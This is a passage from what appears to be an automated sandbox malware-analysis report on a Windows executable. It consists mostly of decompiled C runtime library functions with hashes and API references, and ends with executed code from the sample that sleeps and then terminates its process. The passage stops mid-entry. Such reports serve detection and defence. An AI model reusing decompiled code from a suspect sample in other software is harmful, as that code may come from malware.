Opcode Fuzzy Hash: 42ce375bee8a8cf742697974e5cdae8eb36b2f87cd69389d819ec3c053a1e79a
Instruction Fuzzy Hash: 01F09031A00A09E2DF012BA2BD0A36F7A79BB80746F9604B1E1D2F00E5CF3585B1824E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C56B Relevance: 6.1, APIs: 4, Instructions: 137
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0040C56B(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(_t82 == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(_a12 > _t63 / _a8) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040C407(_t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040C0F3(_t100));
										_t74 = E00411BEA(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0041098A(_t90, _t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E00407BB0(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E00407F57();
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E00406D3E(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040c56b
0x0040c57b
0x0040c5a1
0x00000000
0x0040c582
0x0040c582
0x0040c587
0x0040c5a8
0x0040c5ab
0x0040c5ad
0x00000000
0x00000000
0x0040c5af
0x0040c5b4
0x0040c5b7
0x0040c5ba
0x00000000
0x00000000
0x0040c5bf
0x0040c5c3
0x0040c5ca
0x0040c5cd
0x0040c5d0
0x0040c5d2
0x0040c5dc
0x0040c5d4
0x0040c5d7
0x0040c5d7
0x0040c5e3
0x0040c5e5
0x0040c6aa
0x00000000
0x0040c5eb
0x0040c5eb
0x0040c5ee
0x0040c5ee
0x0040c5f4
0x0040c625
0x0040c625
0x0040c628
0x0040c681
0x0040c688
0x0040c68b
0x0040c6b6
0x0040c6b6
0x0040c6b8
0x00000000
0x0040c6bc
0x0040c68d
0x0040c690
0x0040c693
0x0040c694
0x0040c697
0x0040c699
0x0040c69b
0x0040c69b
0x00000000
0x0040c699
0x0040c62a
0x0040c62c
0x0040c639
0x0040c639
0x0040c63d
0x0040c63f
0x0040c643
0x0040c645
0x0040c648
0x0040c648
0x0040c648
0x0040c64a
0x0040c64b
0x0040c655
0x0040c656
0x0040c65b
0x0040c65e
0x0040c661
0x0040c6c4
0x0040c6c4
0x0040c6c8
0x00000000
0x0040c663
0x0040c663
0x0040c665
0x0040c667
0x0040c669
0x0040c669
0x0040c66b
0x0040c66e
0x0040c670
0x0040c672
0x00000000
0x0040c674
0x0040c674
0x0040c674
0x00000000
0x0040c674
0x0040c672
0x0040c661
0x0040c62f
0x0040c635
0x0040c637
0x00000000
0x00000000
0x00000000
0x0040c637
0x0040c5f6
0x0040c5f9
0x0040c5fb
0x00000000
0x00000000
0x0040c5fd
0x0040c6b2
0x0040c6b2
0x0040c6b2
0x00000000
0x0040c6b2
0x0040c603
0x0040c605
0x0040c607
0x0040c609
0x0040c609
0x0040c611
0x0040c616
0x0040c619
0x0040c61b
0x0040c61e
0x0040c620
0x00000000
0x0040c6a2
0x0040c6a2
0x0040c6a2
0x00000000
0x0040c5eb
0x0040c5e5
0x0040c589
0x0040c589
0x0040c58e
0x0040c58f
0x0040c590
0x0040c591
0x0040c592
0x0040c593
0x0040c599
0x00000000
0x0040c59e

APIs

__flush.LIBCMT ref: 0040C62F
__fileno.LIBCMT ref: 0040C64F
__locking.LIBCMT ref: 0040C656
__flsbuf.LIBCMT ref: 0040C681

Part of subcall function 00407F57: __getptd_noexit.LIBCMT ref: 00407F57

Part of subcall function 00406D3E: __decode_pointer.LIBCMT ref: 00406D49

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: 46fff19aee5ea9a8fc14b2be84dca0e4e1a437739d758bfb5711d77188212393
Instruction ID: 9b88df73e6d6caaa745b4f3553991fb21252c6c8a82537d4f00f019dc99cf697
Opcode Fuzzy Hash: 46fff19aee5ea9a8fc14b2be84dca0e4e1a437739d758bfb5711d77188212393
Instruction Fuzzy Hash: 4C41B571A00604EBDB24DF6A88D45AFB7B5AF80324F248B3BE455A72C0D779ED41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004169D6 Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004169D6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E004089C3( &_v20, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E00410D20( *_t72 & 0x000000ff,  &_v20) == 0) {
								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								_t54 = E00407F57();
								 *_t54 = 0x2a;
								if(_v8 != 0) {
									_t54 = _v12;
									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							if(_t65 <= 1 || _a12 < _t65) {
								L17:
								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
								_t56 = _v20;
								if(_t58 != 0) {
									L19:
									_t57 =  *(_t56 + 0xac);
									if(_v8 == 0) {
										return _t57;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t57;
								}
								goto L17;
							}
						}
						_t59 = _a4;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004169e0
0x004169e7
0x004169fe
0x00000000
0x004169ee
0x004169f0
0x00416a0a
0x00416a15
0x00416a47
0x00416ae5
0x00416a25
0x00416a28
0x00416a2d
0x00416a2d
0x00000000
0x00416a33
0x00416aa7
0x00416aa7
0x00416aac
0x00416ab5
0x00416ab7
0x00416aba
0x00416aba
0x00000000
0x00416abe
0x00416a49
0x00416a4c
0x00416a55
0x00416a7c
0x00416a85
0x00000000
0x00000000
0x00000000
0x00000000
0x00416a5c
0x00416a6f
0x00416a77
0x00416a7a
0x00416a8c
0x00416a8c
0x00416a95
0x00416a03
0x00416a03
0x00416a9e
0x00000000
0x00416a9e
0x00000000
0x00416a7a
0x00416a55
0x00416a17
0x00416a1c
0x00416a22
0x00416a22
0x00000000
0x004169f2
0x004169f2
0x004169f7
0x004169fb
0x004169fb
0x00000000
0x004169f7
0x004169f0

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00416A0A
__isleadbyte_l.LIBCMT ref: 00416A3E
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00416A6F
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 00416ADD

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 0bd4586eaa071df3d80ff8fe1865f9c236fdafe29b5be2a119ff0eb7e6a2e53d
Instruction ID: 3fcc8875d0a542d9fff72c78a7b0d81b7994ca812fa713602b319536ce183172
Opcode Fuzzy Hash: 0bd4586eaa071df3d80ff8fe1865f9c236fdafe29b5be2a119ff0eb7e6a2e53d
Instruction Fuzzy Hash: CA31E031A10285EFCB20DF64C8809FE3BB5BF02351B1685AAE466AB291D734DD80DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040947A Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040947A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00408D6B(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00408E5B(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00409380(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004092C5(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0040947f
0x00409485
0x004094f8
0x00000000
0x0040948c
0x0040948c
0x0040948f
0x004094aa
0x004094ad
0x004094cd
0x004094df
0x004094af
0x004094af
0x004094b2
0x00000000
0x004094b4
0x004094c6
0x004094c6
0x004094b2
0x004094fd
0x00409501
0x00409491
0x004094a9
0x004094a9
0x0040948f

APIs

__cftof_l.LIBCMT ref: 004094A0

Part of subcall function 004092C5: __fltout2.LIBCMT ref: 004092F1

__cftog_l.LIBCMT ref: 004094C6
__cftoe_l.LIBCMT ref: 004094F8

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 4be076c938bceef63c2f506d0f7b89980f48a47c416f2f60de0c2e2cad521dc1
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 2311837240414EBBCF125E85DC41CEE3F22BB58354F19842AFE18641B2C73AC972AB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040F45F Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040F45F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x417c58);
				E0040C128(__ebx, __edi, __esi);
				_t29 = E00409F6C(__ebx, __edx, _t31);
				_t13 =  *0x42d194; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E0040DB4D(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x42d278; // 0x42d1a0
					 *((intOrPtr*)(_t30 - 0x1c)) = E0040F421(_t8, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E0040F4C9();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00409F6C(_t22, __edx, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E0040CCA3(_t25, 0x20);
				}
				return E0040C16D(_t29);
			}

0x0040f45f
0x0040f45f
0x0040f45f
0x0040f45f
0x0040f45f
0x0040f461
0x0040f466
0x0040f470
0x0040f472
0x0040f47a
0x0040f49e
0x0040f4a0
0x0040f4a6
0x0040f4aa
0x0040f4ad
0x0040f4b8
0x0040f4bb
0x0040f4c2
0x0040f47c
0x0040f47c
0x0040f480
0x00000000
0x0040f482
0x0040f487
0x0040f487
0x0040f480
0x0040f48c
0x0040f490
0x0040f495
0x0040f49d

APIs

__getptd.LIBCMT ref: 0040F46B

Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C

__getptd.LIBCMT ref: 0040F482
__amsg_exit.LIBCMT ref: 0040F490
__lock.LIBCMT ref: 0040F4A0

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: c1e460487b385be20c3997de28e1949703a13e7a47ebf47c8db6bc9826152023
Instruction ID: ad62b0fe31f90ab5027265babbd9e778aec5ed69125f5d0d4d1c1e1c356c8084
Opcode Fuzzy Hash: c1e460487b385be20c3997de28e1949703a13e7a47ebf47c8db6bc9826152023
Instruction Fuzzy Hash: 95F09631B04700DBE730FB75840275F72A05B50714F51427FA984B7AD2CB3C9905CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFE2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AFE2() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x430280;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x430280 = _t5;
				}
				_t6 = E00410529(_t5, 4);
				 *0x42f260 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x42c7b0;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x42ca30) {
							break;
						}
						_t6 =  *0x42f260;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x42c7c0;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x42f160 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x42c820);
					return 0;
				} else {
					 *0x430280 = _t26;
					_t6 = E00410529(_t26, 4);
					 *0x42f260 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x0040afe2
0x0040afea
0x0040afed
0x0040aff8
0x0040affa
0x00000000
0x0040affa
0x0040afef
0x0040afef
0x0040affc
0x0040affc
0x0040affc
0x0040b004
0x0040b00b
0x0040b012
0x0040b032
0x0040b032
0x0040b034
0x0040b040
0x0040b040
0x0040b043
0x0040b046
0x0040b04f
0x00000000
0x00000000
0x0040b03b
0x0040b03b
0x0040b053
0x0040b054
0x0040b056
0x0040b05c
0x0040b070
0x0040b076
0x0040b080
0x0040b080
0x0040b082
0x0040b085
0x0040b086
0x0040b092
0x0040b014
0x0040b017
0x0040b01d
0x0040b024
0x0040b02b
0x00000000
0x0040b02d
0x0040b02f
0x0040b031
0x0040b031
0x0040b02b

APIs

__calloc_crt.LIBCMT ref: 0040B004
__calloc_crt.LIBCMT ref: 0040B01D

Strings

(!@, xrefs: 0040B049

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: __calloc_crt
String ID: (!@
API String ID: 3494438863-861706809
Opcode ID: 3b89cfb7374a4b6736355ee4ea9648d338a4dcc5e1c608bee5186004743057a2
Instruction ID: c81a334fc5c2411f4df701e27ede37d27c0d3a282a9f30c1c91d009ecc8411c5
Opcode Fuzzy Hash: 3b89cfb7374a4b6736355ee4ea9648d338a4dcc5e1c608bee5186004743057a2
Instruction Fuzzy Hash: 5211C6723043159BE7388A1DBC946672395EB85B68B64427BF521EB3D0E73CCC8256CD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040A6C8(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E004070B6(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00409F6C(__ebx, __edx, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00409F6C(__ebx, __edx, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
							_t17 = E0040708F( *((intOrPtr*)(_t28 + 0x18)));
							_t38 = _t17;
							if(_t17 != 0) {
								_push( *((intOrPtr*)(_t29 + 0x10)));
								_push(_t28);
								return E0040A460(_t38);
							}
						}
					}
				}
				return _t17;
			}

0x0040a6c8
0x0040a6c8
0x0040a6cb
0x0040a6d1
0x0040a6df
0x0040a6e5
0x0040a6ed
0x0040a6f9
0x0040a701
0x0040a709
0x0040a71d
0x0040a728
0x0040a72e
0x0040a730
0x0040a732
0x0040a735
0x00000000
0x0040a73c
0x0040a730
0x0040a71d
0x0040a709
0x0040a73d

APIs

Part of subcall function 004070B6: __getptd.LIBCMT ref: 004070BC
Part of subcall function 004070B6: __getptd.LIBCMT ref: 004070CC

__getptd.LIBCMT ref: 0040A6D7

Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C

__getptd.LIBCMT ref: 0040A6E5

Strings

csm, xrefs: 0040A6F3

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 5b147aff4b10d651f4ceec80f303942da5f950dc06aa6b0fc585759805665184
Instruction ID: 2975dbf0f67d70b07405766a2e2fa21c276c90f76bf20612886aa0b38ed4f4f2
Opcode Fuzzy Hash: 5b147aff4b10d651f4ceec80f303942da5f950dc06aa6b0fc585759805665184
Instruction Fuzzy Hash: D70128368013058ACF349F25C454AAEB3B5AF14315F55893FE482BB7D2CB38D9A1CE1A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ikNC1JE7rY.exePID: 4788, Parent PID: 5644COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				void* _t16;
				intOrPtr* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t22 = __eflags;
				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
				_t17 = _a4;
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, _t20); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				return __eax;
			}

0x0040180c
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000A.00000002.394197178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000A.00000002.394197178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

